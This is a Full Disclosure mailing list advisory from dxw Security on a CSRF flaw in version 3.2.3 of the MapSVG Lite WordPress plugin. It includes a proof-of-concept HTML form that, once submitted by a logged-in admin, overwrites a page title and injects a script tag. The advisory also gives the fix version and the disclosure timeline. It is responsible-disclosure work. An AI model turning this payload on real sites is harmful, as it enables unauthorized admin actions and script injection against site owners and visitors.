Full Disclosure mailing list archives
CSRF in MapSVG Lite could allow an attacker to do almost anything an admin can (WordPress plugin)
From: dxw Security <harry () dxw com>
Date: Tue, 8 Jan 2019 10:03:04 +0000
Details ================ Software: MapSVG Lite Version: 3.2.3 Homepage: https://en-gb.wordpress.org/plugins/mapsvg-lite-interactive-vector-maps/ Advisory report: https://advisories.dxw.com/advisories/csrf-mapsvg-lite/ CVE: Awaiting assignment CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N) Description ================ CSRF in MapSVG Lite could allow an attacker to do almost anything an admin can Vulnerability ================ The plugin uses REST requests to modify post data, and does not check the nonce when doing so. Proof of concept ================ Install the plugin on a site at http://localhost/ Ensure you have page with ID of 2. Whilst logged in, visit an html page with this content and submit the form: <form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php?action=mapsvg_save\"> <input type=\"text\" name=\"data[title]\" value=\"A bad value\"> <input type=\"text\" name=\"data[mapsvg_data]\" value=\"<script>alert(\'hello\')</script>\"> <input type=\"text\" name=\"data[map_id]\" value=\"2\"> <input type=\"submit\"> </form> Visit the page with ID of 2. It now has title of “A bad value” and alerts “hello” on loading. Mitigations ================ Upgrade to version 3.3.0 or above. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://advisories.dxw.com/disclosure/ Please contact us on security () dxw com to acknowledge this report if you received it via a third party (for example, plugins () wordpress org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2018-04-10: Discovered 2018-06-15: Author notified via email 2018-06-15: Author replied, fix to be published in next release 2019-01-08: Advisory published Discovered by dxw: ================ Rob Skilling Please visit advisories.dxw.com for more information. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CSRF in MapSVG Lite could allow an attacker to do almost anything an admin can (WordPress plugin) dxw Security (Jan 08)